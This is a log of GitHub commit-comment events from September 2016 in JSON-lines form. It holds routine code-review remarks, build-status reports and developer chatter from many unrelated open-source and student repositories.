{"id":"4614767061","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164903,"position":57,"line":57,"path":"index.html","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:18:41Z","updated_at":"2016-09-25T19:18:41Z","body":"You can style placeholder as well (`text-transform: uppercase`)."}},"created_at":"2016-09-25T19:18:41Z"}
{"id":"4614767500","type":"CommitCommentEvent","actor":{"login":"nfilzi"},"repo":{"name":"lewagon/active-record-boilerplate"},"payload":{"comment":{"id":19164905,"position":null,"line":null,"path":null,"commit_id":"c0fec02c95314b40573a1a31311fd1ad12f2147d","created_at":"2016-09-25T19:18:55Z","updated_at":"2016-09-25T19:18:55Z","body":"Super nice the `rake console`, not cluttering the lecture anymore 👍 Thanks @ssaunier "}},"created_at":"2016-09-25T19:18:55Z"}
{"id":"4614767713","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164906,"position":null,"line":null,"path":null,"commit_id":"e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab","created_at":"2016-09-25T19:19:03Z","updated_at":"2016-09-25T19:19:03Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2211 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.58%25-red.svg)</a> \n"}},"created_at":"2016-09-25T19:19:03Z"}
{"id":"4614768615","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19164912,"position":null,"line":null,"path":null,"commit_id":"8a3ff5bb02f4fdb2a86121d111874ba4b49cbe86","created_at":"2016-09-25T19:19:40Z","updated_at":"2016-09-25T19:19:40Z","body":"Szívatott ez a git pull, én is az l10n csomagnél döntöttem.\r\nMost ki van próbálva a frissítményed, jónak tűnik."}},"created_at":"2016-09-25T19:19:40Z"}
{"id":"4614772314","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164920,"position":9,"line":9,"path":"js/animation19.js","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:22:01Z","updated_at":"2016-09-25T19:22:01Z","body":"No newline."}},"created_at":"2016-09-25T19:22:01Z"}
{"id":"4614773362","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/xo"},"payload":{"comment":{"id":19164921,"position":18,"line":18,"path":"config/overrides.js","commit_id":"04733f1724a74c494458754d4982de53cdc30eeb","created_at":"2016-09-25T19:22:41Z","updated_at":"2016-09-25T19:22:41Z","body":"@jfmengels Yup, it's already defined as core ESLint rule here: https://github.com/sindresorhus/eslint-config-xo/blob/2bfd6eafc4703433785ab6a34e4f8f2d6978cf2c/index.js#L128"}},"created_at":"2016-09-25T19:22:41Z"}
{"id":"4614773667","type":"CommitCommentEvent","actor":{"login":"maximtop"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19164922,"position":6,"line":6,"path":"test/check_score_clj/core_test.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-25T19:22:54Z","updated_at":"2016-09-25T19:22:54Z","body":"Почитал про макрос are. Добавил его в первый тест, где проверяется ничья. Чтобы проверить как работает, сделал специально ошибку. Запустил тесты и мне не очень понравился этот макрос, потому что при его использовании не видно в каком месте возникла ошибка. Посмотри правильно ли я его использовал. "}},"created_at":"2016-09-25T19:22:54Z"}
{"id":"4614774278","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164925,"position":3,"line":3,"path":"js/animation19.js","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:23:15Z","updated_at":"2016-09-25T19:23:15Z","body":"If you use jQuery, use it in all file – so you don’t need to make it by `for` loop."}},"created_at":"2016-09-25T19:23:15Z"}
{"id":"4614775603","type":"CommitCommentEvent","actor":{"login":"sirmordred"},"repo":{"name":"Evervolv/android_bionic"},"payload":{"comment":{"id":19164927,"position":73,"line":523,"path":"linker/linker_phdr.cpp","commit_id":"57370612b94f13b9378a1c90f89c7b3474b9c30d","created_at":"2016-09-25T19:24:07Z","updated_at":"2016-09-25T19:24:07Z","body":"this change is obsolete because of https://github.com/Evervolv/android_bionic/blob/ng-7.0/linker/linker_phdr.cpp#L465"}},"created_at":"2016-09-25T19:24:07Z"}
{"id":"4614778340","type":"CommitCommentEvent","actor":{"login":"TheLastRar"},"repo":{"name":"TheLastRar/CLR-DEV9"},"payload":{"comment":{"id":19164934,"position":null,"line":null,"path":null,"commit_id":"26edc7b2e6215d4b0363216011f790f97c5edd20","created_at":"2016-09-25T19:25:50Z","updated_at":"2016-09-25T19:25:50Z","body":"Read: Failed to get homebrew titles working"}},"created_at":"2016-09-25T19:25:50Z"}
{"id":"4614779438","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164936,"position":35,"line":35,"path":"index.html","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:26:31Z","updated_at":"2016-09-25T19:26:31Z","body":"If the `.menu` is rather unique (it almost certainly would be only one on the entire site) you don’t need to add the `.menu-item` class to all `<li>`."}},"created_at":"2016-09-25T19:26:31Z"}
{"id":"4614779700","type":"CommitCommentEvent","actor":{"login":"benmosher"},"repo":{"name":"benmosher/eslint-plugin-import"},"payload":{"comment":{"id":19164937,"position":null,"line":null,"path":null,"commit_id":"e3c41ca4005738757815906f1b615810e98f9e6a","created_at":"2016-09-25T19:26:40Z","updated_at":"2016-09-25T19:26:40Z","body":"I think all the parts are necessary for the re-export handling. It's only these trivial cases that have become parser errors. "}},"created_at":"2016-09-25T19:26:40Z"}
{"id":"4614779774","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19164938,"position":null,"line":null,"path":null,"commit_id":"8bf209ed6d292552228fb48984f0a8b84935a44d","created_at":"2016-09-25T19:26:43Z","updated_at":"2016-09-25T19:26:43Z","body":"Ahh, you are right.  Forgot about that...C# doesn't like when you try to\ntrick it multiple dispatch, hah.\n\nOn Sep 25, 2016 3:07 PM, \"Will Mooar\" <notifications@github.com> wrote:\n\n> Hi James, Good idea! I just tried that but sadly it won't compile as the\n> method signature is identical for each T{n}. eg public bool Is<T>() where\n> T: T0 is identical to public bool Is<T>() where T: T1 as far as the\n> compiler is concerned. Am I missing something?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jagged/OneOf/commit/8bf209ed6d292552228fb48984f0a8b84935a44d#commitcomment-19164847>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD_ohcleLq5858dx7dvsEFOoqLhOjq6Nks5qtsZ2gaJpZM4KF6bU>\n> .\n>\n"}},"created_at":"2016-09-25T19:26:43Z"}
{"id":"4614780450","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164942,"position":4,"line":4,"path":"js/animation19.js","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:27:06Z","updated_at":"2016-09-25T19:27:06Z","body":"Instead of adding event listener to each item, just try rewrite it to event delegation (event listener should be added to `.menu` only."}},"created_at":"2016-09-25T19:27:06Z"}
{"id":"4614780994","type":"CommitCommentEvent","actor":{"login":"JaredKramer40"},"repo":{"name":"JaredKramer40/personalWebpage"},"payload":{"comment":{"id":19164944,"position":null,"line":null,"path":null,"commit_id":"0728b9f7f66e794ccb43d82f2150c802ea2bad3b","created_at":"2016-09-25T19:27:26Z","updated_at":"2016-09-25T19:27:26Z","body":"**3jn3jn**"}},"created_at":"2016-09-25T19:27:26Z"}
{"id":"4614781398","type":"CommitCommentEvent","actor":{"login":"JaredKramer40"},"repo":{"name":"JaredKramer40/personalWebpage"},"payload":{"comment":{"id":19164945,"position":null,"line":null,"path":null,"commit_id":"0728b9f7f66e794ccb43d82f2150c802ea2bad3b","created_at":"2016-09-25T19:27:40Z","updated_at":"2016-09-25T19:27:40Z","body":"hello **ncnksdnks**"}},"created_at":"2016-09-25T19:27:40Z"}
{"id":"4614782764","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164949,"position":3,"line":3,"path":"js/animation19.js","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:28:27Z","updated_at":"2016-09-25T19:28:27Z","body":"And you probably don’t need to use jQuery at all."}},"created_at":"2016-09-25T19:28:27Z"}
{"id":"4614786532","type":"CommitCommentEvent","actor":{"login":"pareh"},"repo":{"name":"lynx7/MIUI"},"payload":{"comment":{"id":19164956,"position":null,"line":null,"path":null,"commit_id":"ca9496faceac24a03c212f49e0d6b7ff0d5dba3e","created_at":"2016-09-25T19:30:45Z","updated_at":"2016-09-25T19:30:45Z","body":"MiGallery"}},"created_at":"2016-09-25T19:30:45Z"}
{"id":"4614787739","type":"CommitCommentEvent","actor":{"login":"Block-Build"},"repo":{"name":"BedwarsRel/BedwarsRel"},"payload":{"comment":{"id":19164958,"position":null,"line":null,"path":null,"commit_id":"eb2365d5334a8e4984fa8e752896d17910c8100c","created_at":"2016-09-25T19:31:27Z","updated_at":"2016-09-25T19:31:27Z","body":"@sebastianbinder was hältst du von der Idee?"}},"created_at":"2016-09-25T19:31:27Z"}
{"id":"4614789761","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19164967,"position":null,"line":null,"path":null,"commit_id":"013940250bd8aaa4beee90f418d7a4673981efbd","created_at":"2016-09-25T19:32:35Z","updated_at":"2016-09-25T19:32:35Z","body":"hmm, that irq should be specified by the DMA packet, it says if an IRQ is to be called at the end."}},"created_at":"2016-09-25T19:32:35Z"}
{"id":"4614791002","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Kirezzz/java_programming"},"payload":{"comment":{"id":19164971,"position":22,"line":22,"path":"addressbook-web-tests/src/test/java/ru/stqa/java/adressbook/appmanager/HelperBase.java","commit_id":"46d36286e79cfb5e3914cff6c3305039ec17ba2e","created_at":"2016-09-25T19:33:22Z","updated_at":"2016-09-25T19:33:22Z","body":"клик здес не нужен"}},"created_at":"2016-09-25T19:33:22Z"}
{"id":"4614791173","type":"CommitCommentEvent","actor":{"login":"geldarhb"},"repo":{"name":"race604/react-native-viewpager"},"payload":{"comment":{"id":19164972,"position":null,"line":null,"path":null,"commit_id":"08b9a4bda68a08b131fb86d3afb7fd528594ca94","created_at":"2016-09-25T19:33:28Z","updated_at":"2016-09-25T19:33:28Z","body":"@race604 - can you please update the npm package? It's currently breaking the code because it lacks this commit... Thanks!"}},"created_at":"2016-09-25T19:33:28Z"}
{"id":"4614791692","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Kirezzz/java_programming"},"payload":{"comment":{"id":19164974,"position":24,"line":24,"path":"addressbook-web-tests/src/test/java/ru/stqa/java/adressbook/appmanager/HelperBase.java","commit_id":"46d36286e79cfb5e3914cff6c3305039ec17ba2e","created_at":"2016-09-25T19:33:49Z","updated_at":"2016-09-25T19:33:49Z","body":"финдэдемент - обернуть в отдельный метод\r\nа здесь 2 раза происходит поиск элемента, можно сделать один раз"}},"created_at":"2016-09-25T19:33:49Z"}
{"id":"4614792708","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Kirezzz/java_programming"},"payload":{"comment":{"id":19164979,"position":23,"line":17,"path":"addressbook-web-tests/src/test/java/ru/stqa/java/adressbook/appmanager/SessionHelper.java","commit_id":"46d36286e79cfb5e3914cff6c3305039ec17ba2e","created_at":"2016-09-25T19:34:27Z","updated_at":"2016-09-25T19:34:27Z","body":"//*[@id='LoginForm']/input[3]"}},"created_at":"2016-09-25T19:34:27Z"}
{"id":"4614796266","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19164993,"position":null,"line":null,"path":null,"commit_id":"0c2683cc110659d57e36329585469d5d653a0817","created_at":"2016-09-25T19:36:44Z","updated_at":"2016-09-25T19:36:44Z","body":"Thanks, also backported to 16.09: 135d6f2aa67bea1f65e3769a273af1a470c671fb"}},"created_at":"2016-09-25T19:36:44Z"}
{"id":"4614797090","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19164997,"position":null,"line":null,"path":null,"commit_id":"0c2683cc110659d57e36329585469d5d653a0817","created_at":"2016-09-25T19:37:18Z","updated_at":"2016-09-25T19:37:18Z","body":"Not sure what happened here, though, I called the `update.sh` script and built the stable channel successfully."}},"created_at":"2016-09-25T19:37:18Z"}
{"id":"4614798739","type":"CommitCommentEvent","actor":{"login":"aaaxx"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19165001,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T19:38:18Z","updated_at":"2016-09-25T19:38:18Z","body":"Don't you mean `^\\s*(\\d+)...` if you want to match the third line?"}},"created_at":"2016-09-25T19:38:18Z"}
{"id":"4614799141","type":"CommitCommentEvent","actor":{"login":"aaryllins"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19165003,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T19:38:35Z","updated_at":"2016-09-25T19:38:35Z","body":"D'oh! Thanks, Thomas, I completed missed that. I am unaware of how to rename and change the capitalization when the error is on GitHub itself. I tried renaming the index completely, then committing it, then renaming it back as index.html, but it didn't seem to fix the problem. I apologize if I'm simply missing a step.\r\n\r\n(As an additional note, I still need you to authorize my github url for me to submit my finished work through markbot. Sorry!)\r\n@thomasjbradley "}},"created_at":"2016-09-25T19:38:35Z"}
{"id":"4614810123","type":"CommitCommentEvent","actor":{"login":"SoScared"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19165029,"position":39,"line":115,"path":"mods/ra/rules/ships.yaml","commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T19:45:19Z","updated_at":"2016-09-25T19:45:19Z","body":"fixed"}},"created_at":"2016-09-25T19:45:19Z"}
{"id":"4614810242","type":"CommitCommentEvent","actor":{"login":"5pilow"},"repo":{"name":"leek-wars/leek-wars-client"},"payload":{"comment":{"id":19165030,"position":2,"line":2,"path":".gitignore","commit_id":"51ad3b1683baf8c84a4c7d06fa356bad08622c14","created_at":"2016-09-25T19:45:24Z","updated_at":"2016-09-25T19:45:24Z","body":"I named it like that whitout the dot to make it visible by default, it's more convenient.\r\nIn the apache conf just add the line `AccessFileName \"htaccess\"`"}},"created_at":"2016-09-25T19:45:24Z"}
{"id":"4614810728","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19165031,"position":null,"line":null,"path":null,"commit_id":"417599f83cb6c343bd2ec69cd4b2e9f522123c6e","created_at":"2016-09-25T19:45:41Z","updated_at":"2016-09-25T19:45:41Z","body":"With a dirty update, Dialer and Contacts give FC. To clean the databases, just go to recovery and delete these folders:\r\ndata/data/com.android.providers.contacts\r\ndata/data/com.android.dialer\r\nAfter reboot, connect to network (wifi) and lets contacts re-syncronize. That's all.\r\n"}},"created_at":"2016-09-25T19:45:41Z"}
{"id":"4614812271","type":"CommitCommentEvent","actor":{"login":"SoScared"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19165034,"position":32,"line":288,"path":"mods/ra/weapons/missiles.yaml","commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T19:46:39Z","updated_at":"2016-09-25T19:46:39Z","body":"fixed. set to 7c0 to allow Inaccuracy to play out at Range 6c0"}},"created_at":"2016-09-25T19:46:39Z"}
{"id":"4614813031","type":"CommitCommentEvent","actor":{"login":"mimitts"},"repo":{"name":"mimitts/backchina.com"},"payload":{"comment":{"id":19165036,"position":null,"line":null,"path":null,"commit_id":"70a7448d0a803d723716502b298048440d5bf291","created_at":"2016-09-25T19:47:09Z","updated_at":"2016-09-25T19:47:09Z","body":"继2010年凭《观音山》获东京影后以来，范冰冰迎来了第二个国际A类电影节影后桂冠！25日凌晨，范冰冰工作室在微博分享喜讯，称范冰冰凭借《我不是潘金莲》第64届圣塞巴斯蒂安电影节“最佳女主角”银贝壳大奖。"}},"created_at":"2016-09-25T19:47:09Z"}
{"id":"4614813807","type":"CommitCommentEvent","actor":{"login":"Dabug123"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":19165039,"position":null,"line":null,"path":null,"commit_id":"f114f4514952e811c74249614e49eaa74cc93215","created_at":"2016-09-25T19:47:39Z","updated_at":"2016-09-25T19:47:39Z","body":"Lol no authorship"}},"created_at":"2016-09-25T19:47:39Z"}
{"id":"4614814027","type":"CommitCommentEvent","actor":{"login":"poulson"},"repo":{"name":"xdata-skylark/libskylark"},"payload":{"comment":{"id":19165040,"position":null,"line":null,"path":null,"commit_id":"b8b4c13369d79ab7a586d24a089bc44184cf4ae6","created_at":"2016-09-25T19:47:50Z","updated_at":"2016-09-25T19:47:50Z","body":"Did I break something?"}},"created_at":"2016-09-25T19:47:50Z"}
{"id":"4614817275","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":19165046,"position":4,"line":108,"path":"app/src/main/res/layout-land/review_info.xml","commit_id":"1a8dcae2b3ad634bc5862424a7805a6ea5f828ee","created_at":"2016-09-25T19:49:55Z","updated_at":"2016-09-25T19:49:55Z","body":"Note to self: Seek a solution for scrolling of editext inside nested scroll views"}},"created_at":"2016-09-25T19:49:55Z"}
{"id":"4614818005","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19165051,"position":4,"line":5,"path":"task.harvestAdjoiningSource.js","commit_id":"f2ed56ab3e9335de7cf6e3f89b9f1a6fb8f43a6b","created_at":"2016-09-25T19:50:18Z","updated_at":"2016-09-25T19:50:18Z","body":"This operation can not be completed when a creep isn't in that room, and [`creep.moveTo(source)`](https://github.com/sethten/screeps/commit/f2ed56ab3e9335de7cf6e3f89b9f1a6fb8f43a6b#diff-0382431ce4f00640b138bbb80e299318L8) would also fail as a result."}},"created_at":"2016-09-25T19:50:18Z"}
{"id":"4614818698","type":"CommitCommentEvent","actor":{"login":"sgilroy"},"repo":{"name":"dariosalvi78/cordova-plugin-health"},"payload":{"comment":{"id":19165053,"position":131,"line":131,"path":"activities_map.md","commit_id":"19c71d3d94bc199b5e4ab9496d10372a5e78ac1e","created_at":"2016-09-25T19:50:44Z","updated_at":"2016-09-25T19:50:44Z","body":"@dariosalviwork Treadmill and stroller are reversed here"}},"created_at":"2016-09-25T19:50:44Z"}
{"id":"4614819134","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19165055,"position":9,"line":7,"path":"task.harvestAdjoiningSource.js","commit_id":"f2ed56ab3e9335de7cf6e3f89b9f1a6fb8f43a6b","created_at":"2016-09-25T19:51:02Z","updated_at":"2016-09-25T19:51:02Z","body":"If a creep is not in the room then `flag.room` will be undefined, so check it exists before asking for `flag.room.name`"}},"created_at":"2016-09-25T19:51:02Z"}
{"id":"4614823254","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19165071,"position":null,"line":null,"path":null,"commit_id":"417599f83cb6c343bd2ec69cd4b2e9f522123c6e","created_at":"2016-09-25T19:53:30Z","updated_at":"2016-09-25T19:53:30Z","body":"We must remember to delete folders in updater rom scripts when we will publish next public release, if everything is really fixed obviously :) unfortunately I cannot test yet on mi5 as it's not booting, so I can't use it as daily..! "}},"created_at":"2016-09-25T19:53:30Z"}
{"id":"4614824910","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19165075,"position":null,"line":null,"path":null,"commit_id":"b3e163429563275544826f533ea8970b347ddcf1","created_at":"2016-09-25T19:54:40Z","updated_at":"2016-09-25T19:54:40Z","body":"The -B option is not accepted by my scsynth on a Mac. says it is not recognised. (using sc 3.7.1)\r\n\r\n\r\nScsynth Output\r\n--------------\r\n\r\n**`/Users/rbn/.sonic-pi/log/scsynth.log`**\r\n```\r\n# Starting SuperCollider 2016-09-25 20:45:32\r\nERROR: Invalid option -B\r\nsupercollider_synth  options:\r\n   -v print the supercollider version and exit\r\n   -u <udp-port-number>    a port number 0-65535\r\n   -t <tcp-port-number>    a port number 0-65535\r\n   -c <number-of-control-bus-channels> (default 4096)\r\n   -a <number-of-audio-bus-channels>   (default 128)\r\n   -i <number-of-input-bus-channels>   (default 8)\r\n   -o <number-of-output-bus-channels>  (default 8)\r\n   -z <block-size>                     (default 64)\r\n   -Z <hardware-buffer-size>           (default 0)\r\n   -S <hardware-sample-rate>           (default 0)\r\n   -b <number-of-sample-buffers>       (default 1024)\r\n   -n <max-number-of-nodes>            (default 1024)\r\n   -d <max-number-of-synth-defs>       (default 1024)\r\n   -m <real-time-memory-size>          (default 8192)\r\n   -w <number-of-wire-buffers>         (default 64)\r\n   -r <number-of-random-seeds>         (default 64)\r\n   -D <load synthdefs? 1 or 0>         (default 1)\r\n   -R <publish to Rendezvous? 1 or 0>  (default 1)\r\n   -l <max-logins>                     (default 64)\r\n          maximum number of named return addresses stored\r\n          also maximum number of tcp connections accepted\r\n   -p <session-password>\r\n          When using TCP, the session password must be the first command sent.\r\n          The default is no password.\r\n          UDP ports never require passwords, so for security use TCP.\r\n   -N <cmd-filename> <input-filename> <output-filename> <sample-rate> <header-format> <sample-format>\r\n   -I <input-streams-enabled>\r\n   -O <output-streams-enabled>\r\n   -H <hardware-device-name>\r\n   -V <verbosity>\r\n          0 is normal behaviour\r\n          -1 suppresses informational messages\r\n          -2 suppresses informational and many error messages\r\n   -U <ugen-plugins-path>    a colon-separated list of paths\r\n          if -U is specified, the standard paths are NOT searched for plugins.\r\n   -P <restricted-path>    \r\n          if specified, prevents file-accessing OSC commands from\r\n          accessing files outside <restricted-path>.\r\n\r\nTo quit, send a 'quit' command via UDP or TCP, or press ctrl-C.\r\n\r\n\r\n```\r\n"}},"created_at":"2016-09-25T19:54:40Z"}
{"id":"4614826081","type":"CommitCommentEvent","actor":{"login":"samaaron"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19165080,"position":null,"line":null,"path":null,"commit_id":"b3e163429563275544826f533ea8970b347ddcf1","created_at":"2016-09-25T19:55:26Z","updated_at":"2016-09-25T19:55:26Z","body":"yep, this is a feature of the upcoming release of SuperCollider - 3.8 :-)"}},"created_at":"2016-09-25T19:55:26Z"}
{"id":"4614826422","type":"CommitCommentEvent","actor":{"login":"akurilov"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19165081,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/driver/api/CommonDriverConfigFactory.java","commit_id":"f6252552c540f81c3272d67692ef00f613419dc6","created_at":"2016-09-25T19:55:39Z","updated_at":"2016-09-25T19:55:39Z","body":"let's name it just StorageDriverConfigFactory"}},"created_at":"2016-09-25T19:55:39Z"}
{"id":"4614827249","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"ruslanadotsenko/java_kurs"},"payload":{"comment":{"id":19165083,"position":16,"line":58,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"ed5f01923c8a1d0ec3bb681974d30e725c3398d7","created_at":"2016-09-25T19:56:15Z","updated_at":"2016-09-25T19:56:15Z","body":"public void createContact(ContactData contact)  - здесь тлоько 1 параметр нужен"}},"created_at":"2016-09-25T19:56:15Z"}
{"id":"4614827949","type":"CommitCommentEvent","actor":{"login":"rbnpi"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19165087,"position":null,"line":null,"path":null,"commit_id":"b3e163429563275544826f533ea8970b347ddcf1","created_at":"2016-09-25T19:56:46Z","updated_at":"2016-09-25T19:56:46Z","body":"So for now should it be there? I can just chnage it back locally for now, or do I need to build 3.8?\n\n\n"}},"created_at":"2016-09-25T19:56:46Z"}
{"id":"4614830238","type":"CommitCommentEvent","actor":{"login":"samaaron"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":19165093,"position":null,"line":null,"path":null,"commit_id":"b3e163429563275544826f533ea8970b347ddcf1","created_at":"2016-09-25T19:58:13Z","updated_at":"2016-09-25T19:58:13Z","body":"It's just a security addition which is needed to stop firewall issues from being raised on Windows installations at schools. It's not a functional requirement. It's likely I'll flip it back for Mac/Linux for v2.11 so you can change it back locally with no concerns.\r\n"}},"created_at":"2016-09-25T19:58:13Z"}
{"id":"4613504486","type":"CommitCommentEvent","actor":{"login":"InhoChoi"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19161671,"position":null,"line":null,"path":null,"commit_id":"d93cdda5ae19bf4830a88f5ee76b4f248c16d690","created_at":"2016-09-25T02:00:56Z","updated_at":"2016-09-25T02:00:56Z","body":"![image](https://cloud.githubusercontent.com/assets/9071582/18812433/4fb678b6-830f-11e6-9a28-2a7e0a2e23d7.png)\r\n코드 indent 가 바뀌네요"}},"created_at":"2016-09-25T02:00:56Z"}
{"id":"4613504730","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"Makuta-Miras/The-Enclave"},"payload":{"comment":{"id":19161674,"position":null,"line":null,"path":null,"commit_id":"fce3be9d767bb527f2670ac8b08f225590b69bdc","created_at":"2016-09-25T02:01:08Z","updated_at":"2016-09-25T02:01:08Z","body":"I just saw the screenshot on Steam and said to myself, \"Wow, those are really neat looking ships, I wonder who created them.\" Keep up the good work!"}},"created_at":"2016-09-25T02:01:08Z"}
{"id":"4613509555","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19161685,"position":null,"line":null,"path":null,"commit_id":"c8429d54edf3121afd83b1bfe13197d8f3962b63","created_at":"2016-09-25T02:05:36Z","updated_at":"2016-09-25T02:05:36Z","body":"numLen - 2 - i     3位数  3-2-0=1 unit[1]=百      4位数  4-2-0=2     unit[2]=千    unitArr = {\"十\" , \"百\" , \"千\" };                          "}},"created_at":"2016-09-25T02:05:36Z"}
{"id":"4613509614","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19161686,"position":null,"line":null,"path":null,"commit_id":"c8429d54edf3121afd83b1bfe13197d8f3962b63","created_at":"2016-09-25T02:05:40Z","updated_at":"2016-09-25T02:05:40Z","body":"numLen - 2 - i     3位数  3-2-0=1 unit[1]=百      4位数  4-2-0=2     unit[2]=千    unitArr = {\"十\" , \"百\" , \"千\" };                          "}},"created_at":"2016-09-25T02:05:40Z"}
{"id":"4613511262","type":"CommitCommentEvent","actor":{"login":"284093959"},"repo":{"name":"284093959/hello-world"},"payload":{"comment":{"id":19161691,"position":null,"line":null,"path":null,"commit_id":"66fb231d3e4981429a3924edd6ebef04f9be93d4","created_at":"2016-09-25T02:07:15Z","updated_at":"2016-09-25T02:07:15Z","body":"wocao"}},"created_at":"2016-09-25T02:07:15Z"}
{"id":"4613511561","type":"CommitCommentEvent","actor":{"login":"gregvenech"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":19161694,"position":null,"line":null,"path":null,"commit_id":"a96ed83b7c7822ed4d026773b59363ee7eee27f8","created_at":"2016-09-25T02:07:33Z","updated_at":"2016-09-25T02:07:33Z","body":"@bebraw I'd been meaning to fix this anyway but once you update antwar we can remove my hack. (just seemed unnatural to have the index link floating around in the middle of the rest)"}},"created_at":"2016-09-25T02:07:33Z"}
{"id":"4613511647","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19161695,"position":null,"line":null,"path":null,"commit_id":"736769cd8a7d671753d8b42bbfb50d815ba979e3","created_at":"2016-09-25T02:07:40Z","updated_at":"2016-09-25T02:07:40Z","body":"静静你是不是Pull了。。。 感觉rebase更好哎"}},"created_at":"2016-09-25T02:07:40Z"}
